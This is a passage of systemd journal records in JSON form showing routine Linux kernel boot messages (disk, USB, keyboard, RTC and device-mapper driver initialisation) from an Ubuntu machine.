"kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.1", "_UDEV_SYSNAME" : "0000:00:01.1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1001245", "MESSAGE" : "ata_piix 0000:00:01.1: version 2.13" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=161;b=e2b08827b5804427b422c10c84f1567e;m=56aa3a;t=5bd16dd1a29a2;x=75e5a5ceaf738cb5", "__REALTIME_TIMESTAMP" : "1615280779962786", "__MONOTONIC_TIMESTAMP" : "5679674", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host0", "_UDEV_SYSNAME" : "host0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1002292", "MESSAGE" : "scsi host0: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=162;b=e2b08827b5804427b422c10c84f1567e;m=56aaca;t=5bd16dd1a2a31;x=8576405b03731e66", "__REALTIME_TIMESTAMP" : "1615280779962929", "__MONOTONIC_TIMESTAMP" : "5679818", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "scsi", "_KERNEL_DEVICE" : "+scsi:host1", "_UDEV_SYSNAME" : "host1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1004238", "MESSAGE" : "scsi host1: ata_piix" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=163;b=e2b08827b5804427b422c10c84f1567e;m=56aad9;t=5bd16dd1a2a41;x=138bf646975bf51", "__REALTIME_TIMESTAMP" : "1615280779962945", "__MONOTONIC_TIMESTAMP" : "5679833", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1006029", "MESSAGE" : "ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc0c0 irq 14" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=164;b=e2b08827b5804427b422c10c84f1567e;m=56aae4;t=5bd16dd1a2a4b;x=2194139371723e17", "__REALTIME_TIMESTAMP" : "1615280779962955", "__MONOTONIC_TIMESTAMP" : 
"5679844", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1009318", "MESSAGE" : "ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc0c8 irq 15" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=165;b=e2b08827b5804427b422c10c84f1567e;m=56aafe;t=5bd16dd1a2a65;x=4dc37be8fab0aeaf", "__REALTIME_TIMESTAMP" : "1615280779962981", "__MONOTONIC_TIMESTAMP" : "5679870", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1013436", "MESSAGE" : "libphy: Fixed MDIO Bus: probed" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=166;b=e2b08827b5804427b422c10c84f1567e;m=56ab19;t=5bd16dd1a2a80;x=2cf67f06d0b6d664", "__REALTIME_TIMESTAMP" : "1615280779963008", "__MONOTONIC_TIMESTAMP" : "5679897", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1015489", "MESSAGE" : "tun: Universal TUN/TAP device driver, 1.6" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=167;b=e2b08827b5804427b422c10c84f1567e;m=56ab23;t=5bd16dd1a2a8b;x=378816d957ac1cbf", "__REALTIME_TIMESTAMP" : "1615280779963019", "__MONOTONIC_TIMESTAMP" : "5679907", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1018110", "MESSAGE" : "PPP generic driver version 2.4.2" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=168;b=e2b08827b5804427b422c10c84f1567e;m=56ab2e;t=5bd16dd1a2a95;x=18e4f82f2fb204f5", "__REALTIME_TIMESTAMP" : "1615280779963029", "__MONOTONIC_TIMESTAMP" : "5679918", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1020262", "MESSAGE" : "ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=169;b=e2b08827b5804427b422c10c84f1567e;m=56ab38;t=5bd16dd1a2aa0;x=3e3190bec7f42fb6", "__REALTIME_TIMESTAMP" : "1615280779963040", "__MONOTONIC_TIMESTAMP" : "5679928", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1023545", "MESSAGE" : "ehci-pci: EHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16a;b=e2b08827b5804427b422c10c84f1567e;m=56ab43;t=5bd16dd1a2aaa;x=1ef9ebda111f1d22", "__REALTIME_TIMESTAMP" : "1615280779963050", "__MONOTONIC_TIMESTAMP" : "5679939", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1025829", "MESSAGE" : "ehci-platform: EHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16b;b=e2b08827b5804427b422c10c84f1567e;m=56ab51;t=5bd16dd1a2ab8;x=3dfe6dbf3b16578f", "__REALTIME_TIMESTAMP" : "1615280779963064", "__MONOTONIC_TIMESTAMP" : "5679953", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" 
: "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1028441", "MESSAGE" : "ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16c;b=e2b08827b5804427b422c10c84f1567e;m=56ab5b;t=5bd16dd1a2ac3;x=5c45b4e56c4e32d3", "__REALTIME_TIMESTAMP" : "1615280779963075", "__MONOTONIC_TIMESTAMP" : "5679963", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1031526", "MESSAGE" : "ohci-pci: OHCI PCI platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16d;b=e2b08827b5804427b422c10c84f1567e;m=56ab66;t=5bd16dd1a2acd;x=c6af84ea0edcf2a4", "__REALTIME_TIMESTAMP" : "1615280779963085", "__MONOTONIC_TIMESTAMP" : "5679974", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1033861", "MESSAGE" : "ohci-platform: OHCI generic platform driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16e;b=e2b08827b5804427b422c10c84f1567e;m=56ab71;t=5bd16dd1a2ad8;x=27122ae32a945e34", "__REALTIME_TIMESTAMP" : "1615280779963096", "__MONOTONIC_TIMESTAMP" : "5679985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1036472", "MESSAGE" : "uhci_hcd: USB Universal Host Controller Interface driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=16f;b=e2b08827b5804427b422c10c84f1567e;m=56ac12;t=5bd16dd1a2b79;x=6e5c6dcfc49b8307", 
"__REALTIME_TIMESTAMP" : "1615280779963257", "__MONOTONIC_TIMESTAMP" : "5680146", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1065982", "MESSAGE" : "uhci_hcd 0000:00:01.2: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=170;b=e2b08827b5804427b422c10c84f1567e;m=56aca9;t=5bd16dd1a2c11;x=6cc042b6b48f343f", "__REALTIME_TIMESTAMP" : "1615280779963409", "__MONOTONIC_TIMESTAMP" : "5680297", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1068810", "MESSAGE" : "uhci_hcd 0000:00:01.2: new USB bus registered, assigned bus number 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=171;b=e2b08827b5804427b422c10c84f1567e;m=56ad2b;t=5bd16dd1a2c93;x=4773aee5aabdab80", "__REALTIME_TIMESTAMP" : "1615280779963539", "__MONOTONIC_TIMESTAMP" : "5680427", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1072774", "MESSAGE" : "uhci_hcd 0000:00:01.2: detected 2 ports" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=172;b=e2b08827b5804427b422c10c84f1567e;m=56d595;t=5bd16dd1a54fc;x=251c545145a04c84", "__REALTIME_TIMESTAMP" : 
"1615280779973884", "__MONOTONIC_TIMESTAMP" : "5690773", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:01.2", "_UDEV_SYSNAME" : "0000:00:01.2", "_SOURCE_MONOTONIC_TIMESTAMP" : "1075535", "MESSAGE" : "uhci_hcd 0000:00:01.2: irq 11, io base 0x0000c080" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=173;b=e2b08827b5804427b422c10c84f1567e;m=56d6aa;t=5bd16dd1a5612;x=9be4e9f717037fc4", "__REALTIME_TIMESTAMP" : "1615280779974162", "__MONOTONIC_TIMESTAMP" : "5691050", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1078685", "MESSAGE" : "usb usb1: New USB device found, idVendor=1d6b, idProduct=0001" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=174;b=e2b08827b5804427b422c10c84f1567e;m=56d753;t=5bd16dd1a56ba;x=edb68a51b32d1f48", "__REALTIME_TIMESTAMP" : "1615280779974330", "__MONOTONIC_TIMESTAMP" : "5691219", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1082159", "MESSAGE" : "usb usb1: New USB device strings: Mfr=3, Product=2, SerialNumber=1" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=175;b=e2b08827b5804427b422c10c84f1567e;m=56d7f3;t=5bd16dd1a575a;x=4551231a8f22525c", "__REALTIME_TIMESTAMP" : "1615280779974490", "__MONOTONIC_TIMESTAMP" : "5691379", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1085960", "MESSAGE" : "usb usb1: Product: UHCI Host Controller" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=176;b=e2b08827b5804427b422c10c84f1567e;m=571306;t=5bd16dd1a926d;x=87ece26f0c49ecc4", "__REALTIME_TIMESTAMP" : "1615280779989613", "__MONOTONIC_TIMESTAMP" : "5706502", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1088517", "MESSAGE" : "usb usb1: Manufacturer: Linux 4.15.0-60-generic uhci_hcd" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=177;b=e2b08827b5804427b422c10c84f1567e;m=571413;t=5bd16dd1a937b;x=322d5212720146ca", "__REALTIME_TIMESTAMP" : "1615280779989883", "__MONOTONIC_TIMESTAMP" : "5706771", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "c189:0", "_UDEV_DEVNODE" : "/dev/bus/usb/001/001", "_UDEV_SYSNAME" : "usb1", "_SOURCE_MONOTONIC_TIMESTAMP" : "1091807", "MESSAGE" : "usb usb1: SerialNumber: 
0000:00:01.2" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=178;b=e2b08827b5804427b422c10c84f1567e;m=572760;t=5bd16dd1aa6c7;x=e9bd32cc57333af6", "__REALTIME_TIMESTAMP" : "1615280779994823", "__MONOTONIC_TIMESTAMP" : "5711712", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1094287", "MESSAGE" : "hub 1-0:1.0: USB hub found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=179;b=e2b08827b5804427b422c10c84f1567e;m=572807;t=5bd16dd1aa76e;x=1424ea86ec6e89e1", "__REALTIME_TIMESTAMP" : "1615280779994990", "__MONOTONIC_TIMESTAMP" : "5711879", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "usb", "_KERNEL_DEVICE" : "+usb:1-0:1.0", "_UDEV_SYSNAME" : "1-0:1.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "1096296", "MESSAGE" : "hub 1-0:1.0: 2 ports detected" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17a;b=e2b08827b5804427b422c10c84f1567e;m=572818;t=5bd16dd1aa77f;x=487a777dc803ce69", "__REALTIME_TIMESTAMP" : "1615280779995007", "__MONOTONIC_TIMESTAMP" : "5711896", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1098684", "MESSAGE" : "i8042: PNP: PS/2 Controller [PNP0303:KBD,PNP0f13:MOU] at 0x60,0x64 irq 1,12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17b;b=e2b08827b5804427b422c10c84f1567e;m=572824;t=5bd16dd1aa78b;x=c885aa5c0b1f5851", 
"__REALTIME_TIMESTAMP" : "1615280779995019", "__MONOTONIC_TIMESTAMP" : "5711908", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1103996", "MESSAGE" : "serio: i8042 KBD port at 0x60,0x64 irq 1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17c;b=e2b08827b5804427b422c10c84f1567e;m=57282f;t=5bd16dd1aa796;x=1ac2ff77ced2737", "__REALTIME_TIMESTAMP" : "1615280779995030", "__MONOTONIC_TIMESTAMP" : "5711919", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1106696", "MESSAGE" : "serio: i8042 AUX port at 0x60,0x64 irq 12" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17d;b=e2b08827b5804427b422c10c84f1567e;m=572839;t=5bd16dd1aa7a1;x=1843acc11db0ccff", "__REALTIME_TIMESTAMP" : "1615280779995041", "__MONOTONIC_TIMESTAMP" : "5711929", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1109449", "MESSAGE" : "mousedev: PS/2 mouse device common for all mice" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17e;b=e2b08827b5804427b422c10c84f1567e;m=572844;t=5bd16dd1aa7ac;x=50d9fe56fe48eab5", "__REALTIME_TIMESTAMP" : "1615280779995052", "__MONOTONIC_TIMESTAMP" : "5711940", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1112923", 
"MESSAGE" : "input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=17f;b=e2b08827b5804427b422c10c84f1567e;m=573263;t=5bd16dd1ab1cb;x=68a985843a955b82", "__REALTIME_TIMESTAMP" : "1615280779997643", "__MONOTONIC_TIMESTAMP" : "5714531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1117456", "MESSAGE" : "rtc_cmos 00:00: RTC can wake from S4" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=180;b=e2b08827b5804427b422c10c84f1567e;m=573302;t=5bd16dd1ab26a;x=c6cc0e35801d1ce9", "__REALTIME_TIMESTAMP" : "1615280779997802", "__MONOTONIC_TIMESTAMP" : "5714690", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1120562", "MESSAGE" : "rtc_cmos 00:00: rtc core: registered rtc_cmos as rtc0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=181;b=e2b08827b5804427b422c10c84f1567e;m=573384;t=5bd16dd1ab2eb;x=c4d65f02f5e85074", "__REALTIME_TIMESTAMP" : "1615280779997931", "__MONOTONIC_TIMESTAMP" : "5714820", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "1123947", "MESSAGE" : "rtc_cmos 00:00: alarms up to one 
day, y3k, 114 bytes nvram" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=182;b=e2b08827b5804427b422c10c84f1567e;m=573392;t=5bd16dd1ab2fa;x=2e98378bbae74b79", "__REALTIME_TIMESTAMP" : "1615280779997946", "__MONOTONIC_TIMESTAMP" : "5714834", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1127232", "MESSAGE" : "i2c /dev entries driver" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=183;b=e2b08827b5804427b422c10c84f1567e;m=57339e;t=5bd16dd1ab306;x=b16628e86e165900", "__REALTIME_TIMESTAMP" : "1615280779997958", "__MONOTONIC_TIMESTAMP" : "5714846", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1129173", "MESSAGE" : "device-mapper: uevent: version 1.0.3" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=184;b=e2b08827b5804427b422c10c84f1567e;m=5733aa;t=5bd16dd1ab312;x=58fad9fec424c6a4", "__REALTIME_TIMESTAMP" : "1615280779997970", "__MONOTONIC_TIMESTAMP" : "5714858", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "1131565", "MESSAGE" : "device-mapper: ioctl: 4.37.0-ioctl (2017-09-20) initialised: dm-devel@redhat.com" } { "__CURSOR" : 